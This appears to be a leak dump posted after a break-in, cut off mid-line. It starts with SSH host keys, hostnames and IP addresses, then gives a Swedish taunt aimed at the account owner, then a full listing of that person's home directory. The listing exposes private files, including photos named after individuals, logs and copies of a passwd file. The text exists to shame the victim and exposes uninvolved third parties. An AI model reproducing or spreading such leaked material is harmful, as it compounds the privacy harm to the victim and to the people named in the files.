AAAAB3NzaC1kc3MAAACBAIhBjLqHWYd75MihhDXpAQ3Hk/2CnFT1iSOC5oT3HKMOtZ9jKDrxsE9rT2Z7nQYElcs10rVDcTI0vnQtjMpraKOt2p0z3KuCVzgtTc++V7kDaR9jGzG2Q21rZf7m/xGpjTWjaCpIPkrdG8c1UOnDtqRfaFKxQTAtoMuGU28FPG71AAAAFQDAEbuei1UUXphswCKJkmeACwhM4QAAAIEAgI/0dLn6LNpXlaGPwh4f4n2FwMgF+wLQEgyzAdFRJVVpg2bbmrNwcS+q9pKmTyqXQf6ffdYxSxYqyVlr9y2uq5Ypmw0VN8VeNfvEruRzl2py8e9OjmFktvaWSouewdWQwWai+MM6LjUvKjTnlTUKYgAhYL5UJHEc3DPgF+rFplwAAACABKht1GiC68WNWd4MJ7ciQ8tWkBXPovy6+vDFWiCpIhJceBMQPD0GHGivj/7vXm87/8w7MZO28pk2i/edeaqlskSNS3PgyDFDigzJLz3SPsk042vsjXKw9fLcbN5xvbVHa/a1RuQV/NL/oYghUBQ1Xzch507WBp1XhUb+ofTk5GQ= warez.spacedump.pp.se 1024 33 168151578264579140639696453178019738841809063112571996663912298218985713296408221853335115268160062262281374797843836493948217369130749728533115721721903399806241604580469229335000742846562828265405453401230514916705128731325658466058370410655791677481994254580601189829821100386246370876194934518807339978597 web.remedy.nu,217.78.33.248 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzODb4LqgNLJsq4yj2onHGgLxiVV5Fr7bk+Jw76/+AzpkJC1mWbSAJqb0FruxwXdt6zW8zd6nYx3ykcYzpwlU2bIKOAuK6FMXAJ9F7U5PYVPyWfNewkw58236hyamKqI4SBUvbjNhAJWZLkM6BGYKoKQ9FSRtmWQSW+FZpY3nMsM= bettan.linux.se ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw/LVY6QiGIpCB2/fNObNXluJzzdsRX8feyQOpTtLd4KWPBoUZZVpRm0nkPIMcJhms0LVzK0RQWw/3J9J/vJpACQBMdqlIAcX1hmwW7zbABwoVlzMBGnVz/pqcUl9PsO8/pOB9ihgnKyOcrUItPyUhipU50cXYe62/paBBMAZ1N0= birdie.org,195.58.102.38 1024 35 139215770721134631165840435133246542936457575569832547840725449750787634902827510805681976255449193566376182605688384350599762552274373156442881725731427335168845280986403679841602825046856595717584181164849298517807180166919656766868865818731391748570862615951764710932219567500051207747687036301490908879839 warez,194.236.124.48 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0Oj0s6bGL/uXuSaUb9QGG1z3klcdivozVCBvMwe6wmGBTSuttwU7mMOhVEubqHiEVO0DsPzFXr8Sgjn94GmP5L8nQyRgkSkAxsvhM2r7RHCrP3uSZ82gB3zO8/AfzE0aQA1MokH5mA1GVJtlQ/+1la909aGfeSKXlLAHiZ8xzWE= # # Hgr_, Perrra, Sidewalk, Ahnberg, Chorus, #linux.se # Att s mnga litar p en kille som r s tokgd. # Och d har vi nd editerat bort 3/4 av alla hosts. # # r just DU drabbad/pverkad av detta intrnget? # Std oss i kampanjen "passwd -l spacedmp" fr att begrnsa framtida skador! # $ cd .. $ ls zonefiles_klubba-tm.tar zones zones2 -rw-r--r-- 1 spacedmp spacedmp 142061 Apr 25 2001 2001-04-02.zip -rw-r--r-- 1 spacedmp spacedmp 80781 Apr 25 2001 2001-04-11.zip -rw-r--r-- 1 spacedmp spacedmp 142487 Apr 25 2001 wxrd-1.0.tar.gz -rw-r--r-- 1 spacedmp spacedmp 121141 Apr 27 2001 libusb-0.1.3b.tar.gz -rw-r--r-- 1 spacedmp spacedmp 606938 Apr 27 2001 gphoto-2.0beta1.tar.gz -rw-r--r-- 1 spacedmp spacedmp 717554 Apr 27 2001 imlib-1.9.10.tar.gz -rw-r--r-- 1 spacedmp spacedmp 709336 Apr 27 2001 gphoto-0.4.3.tar.gz -rw-r--r-- 1 spacedmp spacedmp 143744 Apr 27 2001 screen.jpg -rw-r--r-- 1 spacedmp spacedmp 164471 Apr 29 2001 autolice.gz -rw-r--r-- 1 spacedmp spacedmp 329 Apr 30 2001 .mime.types -rw-r--r-- 1 spacedmp spacedmp 288 Apr 30 2001 .mailcap -rw-r--r-- 1 spacedmp spacedmp 2023307 May 1 2001 kvirc-2.1.1.tar.gz -rw-r--r-- 1 spacedmp spacedmp 8664303 May 1 2001 qt-x11-2.3.0.tar.gz drwxr-xr-x 5 spacedmp spacedmp 1024 May 1 2001 kvirc-2.1.1 drwxr-xr-x 2 root root 1024 May 1 2001 geda-dl drwxr-xr-x 10 spacedmp spacedmp 1024 May 1 2001 geda -rw------- 1 spacedmp spacedmp 323 May 2 2001 gschem.log -rw-r--r-- 1 spacedmp spacedmp 140274 May 3 2001 micq-0.4.6-p4.tgz drwx------ 2 spacedmp spacedmp 1024 May 3 2001 help -rw-r--r-- 1 spacedmp spacedmp 3715 May 4 2001 Unit1.dcu -rw-r--r-- 1 spacedmp spacedmp 3351 May 4 2001 Unit3.dcu -rw-r--r-- 1 spacedmp spacedmp 3351 May 4 2001 Unit2.dcu -rwxr-xr-x 1 spacedmp spacedmp 419284 May 4 2001 Project1 drwxr-xr-x 2 spacedmp spacedmp 1024 May 4 2001 mentor drwxr-xr-x 3 spacedmp spacedmp 1024 May 4 2001 edwin drwxr-xr-x 2 spacedmp spacedmp 1024 May 6 2001 spec drwxr-xr-x 2 spacedmp spacedmp 1024 May 9 2001 Telia -rw-r--r-- 1 spacedmp spacedmp 1104 May 9 2001 strip.gif -rw-r--r-- 1 spacedmp spacedmp 189894 May 17 2001 Johanna_sofia.bmp -rw-r--r-- 1 spacedmp spacedmp 131598 May 17 2001 Tess_Johanna.bmp -rw-r--r-- 1 spacedmp spacedmp 429634 May 17 2001 bild01.bmp -rw-r--r-- 1 spacedmp spacedmp 496453 May 18 2001 cd00002.jpg -rw-r--r-- 1 spacedmp spacedmp 484 May 18 2001 drabant -rw-r--r-- 1 spacedmp spacedmp 125190 May 19 2001 w3cam-0.6.6.tar.gz drwxr-xr-x 5 spacedmp spacedmp 1024 May 19 2001 cam -rw-r--r-- 1 spacedmp spacedmp 677 May 19 2001 konton -rw-r--r-- 1 spacedmp spacedmp 16448 May 23 2001 sms-libmodem.tgz -rw-r--r-- 1 spacedmp spacedmp 40021 May 23 2001 libmodem-1.3.tar.gz drwxr-xr-x 4 spacedmp spacedmp 1024 May 23 2001 lib -rw-r--r-- 1 spacedmp spacedmp 200 May 23 2001 gardin drwx------ 4 spacedmp spacedmp 1024 May 23 2001 .opera -rw-r--r-- 1 spacedmp spacedmp 35 May 23 2001 minicom.log -rw------- 1 spacedmp spacedmp 36 May 24 2001 sites -rw-r--r-- 1 spacedmp spacedmp 5835104 May 24 2001 samba-latest.tar.gz -rw-r--r-- 1 spacedmp spacedmp 14 May 24 2001 dell -rw-r--r-- 1 spacedmp spacedmp 409976 May 24 2001 remedy.db -rw-r--r-- 1 spacedmp spacedmp 1298109 May 27 2001 glftpd-lnx_1.23.tgz -rw-r--r-- 1 spacedmp spacedmp 5433806 May 27 2001 driving.mp3 -rw-r--r-- 1 spacedmp spacedmp 114 May 28 2001 stuff-that-I-need -rw-r--r-- 1 spacedmp spacedmp 15360 May 29 2001 shellkonto-2.xls -rw-r--r-- 1 spacedmp spacedmp 1941676 May 29 2001 gnupg-1.0.6.tar.gz drwxr-xr-x 3 spacedmp spacedmp 1024 May 31 2001 djdjd -rw------- 1 spacedmp spacedmp 79 May 31 2001 ircd -rw-r--r-- 1 spacedmp spacedmp 5538731 Jun 2 2001 Cyanide-Angel_astray-01-Revelation_of_my_supremacy.mp3 -rw-r--r-- 1 spacedmp spacedmp 6613917 Jun 2 2001 Cyanide-Angel_astray-02-Angel_astray.mp3 -r-------- 1 spacedmp spacedmp 210 Jun 2 2001 free-mall -rw-r--r-- 1 spacedmp spacedmp 311 Jun 2 2001 linuxse-freehosting -rwxr-xr-x 1 spacedmp spacedmp 242 Jun 2 2001 makehost drwxr-xr-x 3 spacedmp spacedmp 1024 Jun 3 2001 ggjg -rw-r--r-- 1 spacedmp spacedmp 27 Jun 3 2001 .kvirc-2.1.1.rc -rw-r--r-- 1 spacedmp spacedmp 2044 Jun 3 2001 test.c -rw------- 1 spacedmp spacedmp 46 Jun 3 2001 .wmpinboarddata -rw-r--r-- 1 spacedmp spacedmp 1174579 Jun 4 2001 FLUSWEp22-35.pdf -rw-r--r-- 1 spacedmp spacedmp 417814 Jun 4 2001 FLUSWEp42-47.pdf -rw-r--r-- 1 spacedmp spacedmp 331 Jun 8 2001 files -rw-r--r-- 1 spacedmp spacedmp 7391823 Jun 9 2001 fonts.tgz -rw-r--r-- 1 spacedmp spacedmp 1927 Jun 10 2001 .acrorc -rw-r--r-- 1 spacedmp spacedmp 125 Jun 10 2001 gvle-frslag -rw-r--r-- 1 spacedmp spacedmp 149 Jun 11 2001 pluttan -rw-r--r-- 1 spacedmp spacedmp 1973923 Jun 12 2001 mutt-1.2.5i.tar.gz drwx------ 2 spacedmp spacedmp 1024 Jun 12 2001 Mail -rw-r--r-- 1 spacedmp spacedmp 434 Jun 12 2001 .muttrc -rw-r--r-- 1 spacedmp spacedmp 52483 Jun 13 2001 unrar-2.50.tar.gz -rw-r--r-- 1 spacedmp spacedmp 20310 Jun 13 2001 rational_server_perm.dat -rw-r--r-- 1 spacedmp spacedmp 88802 Jun 17 2001 mozilla-i686-pc-linux-gnu-0.9.1-installer.tar.gz -rw-r--r-- 1 spacedmp spacedmp 51470 Jun 17 2001 fweb10.jpg drwxr-xr-x 3 spacedmp spacedmp 1024 Jun 17 2001 .mozilla drwxr-xr-x 3 spacedmp spacedmp 1024 Jun 17 2001 .fullcircle -rw-r--r-- 1 spacedmp spacedmp 410 Jun 17 2001 moz-env drwxr-xr-x 17 spacedmp spacedmp 1024 Jun 17 2001 .gimp-1.2 -rw-r--r-- 1 spacedmp spacedmp 11 Jun 18 2001 eva-tidaholm drwxr-xr-x 2 spacedmp spacedmp 20480 Jun 18 2001 picsdl -rw-r--r-- 1 spacedmp spacedmp 3001 Jun 19 2001 IrcLog.#Sverige -rw-r--r-- 1 spacedmp spacedmp 1542 Jun 22 2001 fake -rw-r--r-- 1 spacedmp spacedmp 106 Jun 27 2001 ohms -r-------- 1 spacedmp spacedmp 5 Jun 28 2001 sd-test -rw-r--r-- 1 spacedmp spacedmp 28277649 Jun 30 2001 pics.tar.gz -rw-r--r-- 1 spacedmp spacedmp 147 Jun 30 2001 opers.irc.linux.se.mlist -rw-r--r-- 1 spacedmp spacedmp 201 Jul 1 2001 UV -rw-r--r-- 1 spacedmp spacedmp 113506 Jul 4 2001 sd-visa-id.jpg -rw----r-- 1 spacedmp spacedmp 3579 Jul 6 2001 2219.c -rwxr-xr-x 1 spacedmp spacedmp 14418 Jul 6 2001 2219 -rwxr-xr-x 1 spacedmp spacedmp 14418 Jul 6 2001 ex -rwxr-xr-x 1 spacedmp spacedmp 565541 Jul 7 2001 dsc00421.jpg -rw-r--r-- 1 spacedmp spacedmp 1412638 Jul 7 2001 krb4-1.0.8.tar.gz -rw-r--r-- 1 spacedmp spacedmp 1890304 Jul 8 2001 BamseSaga1.mp3 -rw-r--r-- 1 spacedmp spacedmp 258611200 Jul 8 2001 firewall-backup.tar drwxr-xr-x 3 spacedmp spacedmp 1024 Jul 9 2001 removed-pics -rw-r--r-- 1 spacedmp spacedmp 659759 Jul 9 2001 ScrollZ-1.8l.tar.gz -rw-r--r-- 1 spacedmp spacedmp 15762 Jul 10 2001 Johanna2.jpg -rw-r--r-- 1 spacedmp spacedmp 3229698 Jul 10 2001 Jimi_Hendrix_-_Foxy_Lady.mp3 -rw------- 1 spacedmp spacedmp 13644979 Jul 11 2001 irc.log.gz drwxr-xr-x 2 spacedmp spacedmp 1024 Jul 13 2001 patches drwx------ 5 spacedmp spacedmp 1024 Jul 14 2001 .netscape -rw-r--r-- 1 spacedmp spacedmp 23 Jul 18 2001 lunarstorm -rw-r--r-- 1 spacedmp spacedmp 700012 Jul 20 2001 asn.txt -rw-r--r-- 1 spacedmp spacedmp 13672 Jul 20 2001 as2.png -rw-r--r-- 1 spacedmp spacedmp 17215 Jul 20 2001 as1.png -rw-r--r-- 1 spacedmp spacedmp 10 Jul 20 2001 bokning drwxr-xr-x 2 spacedmp spacedmp 1024 Jul 22 2001 jupe -rw-r--r-- 1 spacedmp spacedmp 10390 Jul 23 2001 cidr.c -rw------- 1 spacedmp spacedmp 1537 Jul 24 2001 se-opers.log -rw-r--r-- 1 spacedmp spacedmp 3634 Jul 25 2001 jupe.tar.gz -rw------- 1 spacedmp spacedmp 50362 Jul 25 2001 nisse.log.old -rw-r--r-- 1 spacedmp spacedmp 9647 Jul 26 2001 ume.to.log -rw-r--r-- 1 spacedmp spacedmp 0 Jul 27 2001 .signature -rw-r--r-- 1 spacedmp spacedmp 12359788 Jul 28 2001 x-stilletto_heels.zip drwxr-xr-x 2 spacedmp spacedmp 5120 Jul 28 2001 pornpics -rw-r--r-- 1 spacedmp spacedmp 659759 Jul 28 2001 ScrollZ-1.8l.tar.gz.1 -rw-r--r-- 1 spacedmp spacedmp 305 Jul 30 2001 ircnet.lusers -rw-r--r-- 1 spacedmp spacedmp 489 Jul 30 2001 efnet.lusers -rw-r--r-- 1 spacedmp spacedmp 25096 Aug 1 2001 tcptraceroute-1.2.tar.gz -rw-r--r-- 1 spacedmp spacedmp 25300 Aug 1 2001 stealth.grep -rwxr-xr-x 1 root root 38476 Aug 2 2001 htpasswd -rwxr-xr-x 1 spacedmp spacedmp 6420632 Aug 2 2001 200108011008996653575.sql.bz2 -rw-r--r-- 1 spacedmp spacedmp 19 Aug 3 2001 url -rw-r--r-- 1 spacedmp spacedmp 135 Aug 3 2001 irc.swipnet.se drwxr-xr-x 2 spacedmp spacedmp 1024 Aug 12 2001 burken.nu -rwxr--r-- 1 spacedmp spacedmp 12288 Aug 18 2001 shell-20010704-20010810.xls -rw-r--r-- 1 spacedmp spacedmp 753 Aug 19 2001 burken.nu-nmap.log -rw------- 1 spacedmp spacedmp 3201 Aug 19 2001 .micqrc -rw-r--r-- 1 spacedmp spacedmp 238 Sep 26 2001 spar -rw-r--r-- 1 spacedmp spacedmp 26937 Sep 29 2001 graphical.zip -rw-r--r-- 1 spacedmp spacedmp 132257 Oct 1 2001 jolli_tuttar.jpg -rw-r--r-- 1 spacedmp spacedmp 301428 Oct 7 2001 sanna_sover2.JPG -rw-r--r-- 1 spacedmp spacedmp 13380 Oct 7 2001 sanna_sover.JPG drwxr-xr-x 2 spacedmp spacedmp 1024 Oct 8 2001 net -rw-rw-r-- 1 spacedmp spacedmp 1244286 Oct 9 2001 cap002.bmp -rw-r--r-- 1 spacedmp spacedmp 3755168 Oct 12 2001 Eldkvarn_-_Krlekens_Tunga.mp3 -rw-r--r-- 1 spacedmp spacedmp 49 Oct 13 2001 .packages -rw-r--r-- 1 spacedmp spacedmp 562 Oct 14 2001 buildgraphs.sh -rw-r--r-- 1 spacedmp spacedmp 2338 Oct 14 2001 fs02load.png -rw-r--r-- 1 spacedmp spacedmp 634 Oct 14 2001 mailstats -rw-r--r-- 1 spacedmp spacedmp 854153 Oct 15 2001 nmap-2.54BETA30.tgz -rw-r--r-- 1 spacedmp spacedmp 7582 Oct 15 2001 natverk1.txt -rw-r--r-- 1 spacedmp spacedmp 19603 Oct 15 2001 mysql.dump -rw-r--r-- 1 spacedmp spacedmp 22 Oct 19 2001 ericsson drwxr-xr-x 7 spacedmp spacedmp 1024 Oct 19 2001 porno -rw-r--r-- 1 spacedmp spacedmp 671722 Oct 20 2001 irc2.10.3p3.tgz drwxr-xr-x 2 spacedmp spacedmp 1024 Oct 20 2001 .ssh -r-------- 1 spacedmp spacedmp 125 Oct 21 2001 warez -rw-r--r-- 1 spacedmp spacedmp 176933 Oct 21 2001 LEX7.JPG -rw-r--r-- 1 spacedmp spacedmp 188678 Oct 21 2001 lex-nrbild.JPG -rw-r--r-- 1 spacedmp spacedmp 141391 Oct 21 2001 LEX6.JPG -rw-r--r-- 1 spacedmp spacedmp 155575 Oct 21 2001 LEX5.JPG -rw-r--r-- 1 spacedmp spacedmp 178142 Oct 21 2001 lexochsladden.JPG -rw-r--r-- 1 spacedmp spacedmp 251443 Oct 21 2001 LEX3.JPG -rw-r--r-- 1 spacedmp spacedmp 326972 Oct 21 2001 LEX4.JPG -rw-r--r-- 1 spacedmp spacedmp 152896 Oct 21 2001 lex_i_luften.JPG -rw-r--r-- 1 spacedmp spacedmp 282558 Oct 21 2001 LEX1.JPG -rw-r--r-- 1 spacedmp spacedmp 150965 Oct 21 2001 lex_o_disktrasan.JPG -rw-r--r-- 1 spacedmp spacedmp 160200 Oct 21 2001 lex_o_siemens.JPG -rw-r--r-- 1 spacedmp spacedmp 176153 Oct 21 2001 lex_i_sngen.JPG -rw-r--r-- 1 spacedmp spacedmp 165986 Oct 21 2001 lex_tittar_ner.JPG -rw-r--r-- 1 spacedmp spacedmp 195964 Oct 21 2001 lex_o_sladden.JPG -rw-r--r-- 1 spacedmp spacedmp 219589 Oct 21 2001 lex_ser_kul_ut.JPG -rw-r--r-- 1 spacedmp spacedmp 58726 Oct 21 2001 BADRUM.JPG -rw-r--r-- 1 spacedmp spacedmp 154614 Oct 21 2001 BADRUM2.JPG -rw-r--r-- 1 spacedmp spacedmp 207511 Oct 21 2001 lex_i_fotljen.JPG -rw-r--r-- 1 spacedmp spacedmp 150018 Oct 21 2001 08-jolli.jpg -rw-r--r-- 1 spacedmp spacedmp 178690 Oct 21 2001 12-jolli.jpg -rw-r--r-- 1 spacedmp spacedmp 7744 Oct 21 2001 Sanna.jpg -rw-r--r-- 1 spacedmp spacedmp 51 Oct 22 2001 funet drwxr-xr-x 2 spacedmp spacedmp 1024 Oct 22 2001 wap -rw-r--r-- 1 spacedmp spacedmp 35074 Oct 25 2001 lex_bord2.JPG -rw-r--r-- 1 spacedmp spacedmp 120611 Oct 25 2001 lex_i_famnen.JPG -rw-r--r-- 1 spacedmp spacedmp 201723 Oct 25 2001 closeup_lex.JPG -rw-r--r-- 1 spacedmp spacedmp 184130 Oct 25 2001 knarkadSanna.JPG -rw-r--r-- 1 spacedmp spacedmp 221898 Oct 25 2001 lex_sanna.JPG -rw-r--r-- 1 spacedmp spacedmp 196834 Oct 25 2001 lex_bord.JPG -rw-r--r-- 1 spacedmp spacedmp 13 Oct 27 2001 emmelie drwxr-xr-x 2 spacedmp spacedmp 1024 Oct 27 2001 debian -rw-r--r-- 1 spacedmp spacedmp 81 Oct 28 2001 sjsjjs -rwxr-xr-x 1 spacedmp spacedmp 12144 Oct 28 2001 tmp -rw-r--r-- 1 spacedmp spacedmp 357 Oct 28 2001 tmp.c -rw-r--r-- 1 spacedmp spacedmp 16002 Oct 30 2001 sanna_sjuk.JPG -rw-r--r-- 1 spacedmp spacedmp 11356 Oct 30 2001 sanna_sjuk2.JPG -rw-r--r-- 1 spacedmp spacedmp 16664 Oct 30 2001 sanna_sjuk3.JPG -rw-r--r-- 1 spacedmp spacedmp 293 Oct 31 2001 ipv6 -rw-r--r-- 1 spacedmp spacedmp 138 Nov 2 2001 miffonisse -rw-r--r-- 1 spacedmp spacedmp 116 Nov 2 2001 taxi drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 2 2001 ga2 -rw------- 1 spacedmp spacedmp 3453 Nov 4 2001 stenhagen -rw-r--r-- 1 spacedmp spacedmp 6140 Nov 4 2001 sverige2001 -rw-r--r-- 1 spacedmp spacedmp 54956896 Nov 5 2001 holy_smal.mpg -rw-r--r-- 1 spacedmp spacedmp 245470 Nov 6 2001 phpBB-1.4.4.tar.gz drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 11 2001 zones -rw-r--r-- 1 spacedmp spacedmp 785 Nov 12 2001 keff.logg drwx------ 2 spacedmp spacedmp 6144 Nov 13 2001 micq.log -rw-r--r-- 1 spacedmp spacedmp 4603 Nov 13 2001 Gos_hunden.jpg -rw-r--r-- 1 spacedmp spacedmp 5091 Nov 13 2001 Gos_hunden2.jpg -rw-r--r-- 1 spacedmp spacedmp 99634 Nov 13 2001 Bild_4.jpg -rw-r--r-- 1 spacedmp spacedmp 83591 Nov 13 2001 sjuk&frsuen.jpg -rw-r--r-- 1 spacedmp spacedmp 104732 Nov 13 2001 Bild_3.jpg -rw-r--r-- 1 spacedmp spacedmp 109165 Nov 13 2001 Marianne.jpg -rw-r--r-- 1 spacedmp spacedmp 104444 Nov 13 2001 Micke.jpg -rw-r--r-- 1 spacedmp spacedmp 94516 Nov 13 2001 Angelgirl.jpg drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 13 2001 arin -rw-r--r-- 1 spacedmp spacedmp 74198 Nov 14 2001 Spd.jpg -rw-r--r-- 1 spacedmp spacedmp 71025 Nov 14 2001 Spd2.jpg -rw-r--r-- 1 spacedmp spacedmp 88413 Nov 14 2001 Spd3.jpg -rw-rw-rw- 1 spacedmp spacedmp 0 Nov 15 2001 .nfs344cd29a00007de6 -rw-r--r-- 1 spacedmp spacedmp 8 Nov 16 2001 hej -rw-rw-rw- 1 spacedmp spacedmp 0 Nov 16 2001 .nfs344cda1f000084a3 -rw-rw-rw- 1 spacedmp spacedmp 0 Nov 18 2001 .nfs344cd24e000086e7 -rw-r--r-- 1 spacedmp spacedmp 35735 Nov 18 2001 lovisa.JPG -rw-r--r-- 1 spacedmp spacedmp 43341 Nov 18 2001 lovisa_gestikulerar.JPG -rw-r--r-- 1 spacedmp spacedmp 44369 Nov 18 2001 lovisa_kaaaaxig.JPG -rw-r--r-- 1 spacedmp spacedmp 45058 Nov 18 2001 unknown1.jpg -rw-r--r-- 1 spacedmp spacedmp 38398 Nov 18 2001 unknown2.jpg -rw-r--r-- 1 spacedmp spacedmp 39475 Nov 18 2001 unknown3.jpg -rw-r--r-- 1 spacedmp spacedmp 18789 Nov 18 2001 lovisa_silferstedt.JPG -rw-r--r-- 1 spacedmp spacedmp 32173 Nov 18 2001 lovisa_tittar_ner.JPG -rw-r--r-- 1 spacedmp spacedmp 46 Nov 20 2001 funstuff -rw-r--r-- 1 spacedmp spacedmp 163487 Nov 21 2001 tptest.zip -rw-r--r-- 1 spacedmp spacedmp 725 Nov 22 2001 stockholm-bans -rw-r--r-- 1 spacedmp spacedmp 4693 Nov 23 2001 stockholm-clients -rw-r--r-- 1 spacedmp spacedmp 479 Nov 24 2001 zones2 drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 25 2001 test drwx------ 2 spacedmp spacedmp 1024 Nov 25 2001 .gnupg -rw-r--r-- 1 spacedmp spacedmp 106 Nov 25 2001 djdjdjd -rw-r--r-- 1 spacedmp spacedmp 239502 Nov 27 2001 droger.20011126.log -rw-r--r-- 1 spacedmp spacedmp 24352 Nov 27 2001 droger.20011127.log -rw-r--r-- 1 spacedmp spacedmp 315683 Nov 27 2001 droger.20011125.log -r-------- 1 spacedmp spacedmp 45 Nov 27 2001 k-line -rw-r--r-- 1 spacedmp spacedmp 13 Nov 27 2001 djdjdjdjd -rw-r--r-- 1 spacedmp spacedmp 1081040 Nov 29 2001 squid-2.4.STABLE3-src.tar.gz -rw-r--r-- 1 spacedmp spacedmp 22829 Nov 29 2001 stenhagen.lod -rw-r--r-- 1 spacedmp spacedmp 19573 Nov 30 2001 k-lines.log drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 30 2001 slaktarn -rw-r--r-- 1 spacedmp spacedmp 109 Nov 30 2001 sjsjsjs drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 30 2001 hacka drwxr-xr-x 2 spacedmp spacedmp 1024 Dec 2 2001 bin drwxrwxr-x 2 spacedmp spacedmp 1024 Dec 3 2001 skrotaford -rw-r--r-- 1 spacedmp spacedmp 9 Dec 3 2001 molgan -rw-r--r-- 1 spacedmp spacedmp 89444 Dec 3 2001 AMsjuar.gif -rw-r--r-- 1 spacedmp spacedmp 13 Dec 3 2001 www.lunarstorm.se -rw-r--r-- 1 spacedmp spacedmp 34 Dec 5 2001 martin -rw------- 1 spacedmp spacedmp 76353 Dec 7 2001 irclinuxse.log -rw-r--r-- 1 spacedmp spacedmp 11663341 Dec 8 2001 neo4-first(blood)install.wmv -rw-r--r-- 1 spacedmp spacedmp 114468 Dec 8 2001 mf.txt -rw-r--r-- 1 spacedmp spacedmp 13 Dec 12 2001 gunnur -rw-rw-r-- 1 spacedmp spacedmp 1835 Dec 12 2001 sniff.c drwxrwxr-x 2 spacedmp spacedmp 1024 Dec 14 2001 porr -rw-r--r-- 1 spacedmp spacedmp 333 Dec 15 2001 ff -rw-r--r-- 1 spacedmp spacedmp 6602 Dec 15 2001 sd.tar.gz -rw-r--r-- 1 spacedmp spacedmp 6608 Dec 15 2001 sd2.tar.gz drwxr-xr-x 2 spacedmp spacedmp 1024 Dec 15 2001 sniff drwxr-xr-x 2 spacedmp root 1024 Dec 16 2001 mp3 -rw-r--r-- 1 spacedmp spacedmp 33 Dec 18 2001 trackque -rw-r--r-- 1 spacedmp spacedmp 246 Dec 19 2001 hardcopy.14 -rw-r--r-- 1 spacedmp spacedmp 89 Dec 19 2001 falcom -rw-r--r-- 1 spacedmp spacedmp 86016 Dec 25 2001 MOO.DLL drwxr-xr-x 2 spacedmp spacedmp 1024 Dec 26 2001 sniff2 -rwxr-xr-x 1 spacedmp spacedmp 20310 Dec 27 2001 cidr -rw-r--r-- 1 spacedmp spacedmp 61 Dec 27 2001 smsm -rw------- 1 spacedmp spacedmp 203385375 Dec 30 2001 ircnet.log.old.gz drwxr-xr-x 3 spacedmp spacedmp 1024 Dec 30 2001 mp3dl -rw-r--r-- 1 spacedmp spacedmp 1943 Jan 1 2002 HOLMEN.TXT -rw-r--r-- 1 spacedmp spacedmp 3957374 Jan 3 2002 ronny_&_ragge_-_rara_sta_anna.mp3 -rw-r--r-- 1 spacedmp spacedmp 5710 Jan 3 2002 orion.nfo -rw-r--r-- 1 spacedmp spacedmp 490927 Jan 3 2002 ornfb2b2.zip -rw-r--r-- 1 spacedmp spacedmp 601 Jan 3 2002 kernel-fbsd -rw-r--r-- 1 spacedmp spacedmp 4266 Jan 4 2002 tgrep.log -rw-r--r-- 1 spacedmp spacedmp 4758 Jan 4 2002 tgrep.log.host-to-ip -rw-r--r-- 1 spacedmp spacedmp 121 Jan 6 2002 k-lines drwxrwxr-x 2 spacedmp spacedmp 1024 Jan 6 2002 franvaro -rw-r--r-- 1 spacedmp spacedmp 314296 Jan 7 2002 phpMyAdmin-2.2.3-php.tar.gz -rw-r--r-- 1 spacedmp spacedmp 138 Jan 7 2002 compaq drwxr-xr-x 5 root root 1024 Jan 9 2002 Anna drwxr-xr-x 2 spacedmp spacedmp 1024 Jan 11 2002 msn -rw-r--r-- 1 spacedmp spacedmp 46 Jan 11 2002 test.irc -rw-r--r-- 1 spacedmp spacedmp 66786963 Jan 11 2002 Sverigekartan_Version_3.0_Lantmateriet_SWEDiSH.zip -rw-r--r-- 1 spacedmp spacedmp 1163309 Jan 13 2002 pang.mpg drwxr-xr-x 2 spacedmp spacedmp 1024 Jan 15 2002 remove -rw-r--r-- 1 spacedmp spacedmp 9581 Jan 15 2002 passwd -rw-r--r-- 1 spacedmp spacedmp 687 Jan 15 2002 sshd_config drwxr-xr-x 3 spacedmp spacedmp 1024 Jan 15 2002 exploit drwxr-xr-x 5 spacedmp spacedmp 1024 Jan 15 2002 tester drwxr-xr-x 2 spacedmp spacedmp 1024 Jan 15 2002 logs -rw-r--r-- 1 spacedmp spacedmp 169616 Jan 18 2002 adodb171.tgz -rw-r--r-- 1 spacedmp spacedmp 2033661 Jan 18 2002 Duke_Nukem_3D_-_Theme_Song.mp3 drwxr-xr-x 2 spacedmp spacedmp 1024 Jan 19 2002 css -rw-r--r-- 1 spacedmp spacedmp 688 Jan 19 2002 logrotate drwxrwxr-x 2 spacedmp spacedmp 1024 Jan 20 2002 samtalspec -rw-r--r-- 1 spacedmp spacedmp 57201 Jan 24 2002 .ircrc.new -rw-r--r-- 1 spacedmp spacedmp 2326 Jan 29 2002 nu-users -rw-r--r-- 1 spacedmp spacedmp 990 Jan 29 2002 nu-users.scan -rw-rw-r-- 1 spacedmp spacedmp 614697 Jan 29 2002 poslog10.txt -rw-rw-r-- 1 spacedmp spacedmp 593392 Jan 30 2002 poslog20020130.txt -rw-rw-r-- 1 spacedmp spacedmp 567118 Jan 30 2002 poslog20020130-gottsunda-granbyc-gottsunda.txt -rw-r--r-- 1 spacedmp spacedmp 93 Jan 31 2002 GIS -rw-r--r-- 1 spacedmp spacedmp 45 Feb 4 2002 _fjortisar -rw-r--r-- 1 spacedmp spacedmp 45 Feb 4 2002 .fjortisar -rw-r--r-- 1 spacedmp spacedmp 14 Feb 5 2002 brute drwxr-xr-x 2 spacedmp spacedmp 1024 Feb 5 2002 pos -rw-r--r-- 1 spacedmp spacedmp 47322 Feb 8 2002 data.log -rw-r--r-- 1 spacedmp spacedmp 81899 Feb 8 2002 acid-0.9.6b12.tar.gz drwxr-xr-x 35 spacedmp spacedmp 1024 Feb 10 2002 src drwxr-xr-x 2 spacedmp spacedmp 2048 Feb 10 2002 adodb drwxr-xr-x 4 spacedmp spacedmp 1024 Feb 10 2002 phplot -rw-r--r-- 1 spacedmp spacedmp 2002639 Feb 12 2002 webmailen.tgz drwxr-xr-x 2 spacedmp spacedmp 1024 Feb 14 2002 tmpdl -rw-r--r-- 1 spacedmp spacedmp 10017 Feb 16 2002 wget.doit -rw-r--r-- 1 spacedmp spacedmp 44163 Feb 17 2002 lusers.list drwxr-xr-x 2 spacedmp spacedmp 1024 Feb 17 2002 FreeBSD -rw-r--r-- 1 spacedmp spacedmp 2951 Feb 18 2002 poliskoder.txt -rw-r--r-- 1 spacedmp spacedmp 4068 Feb 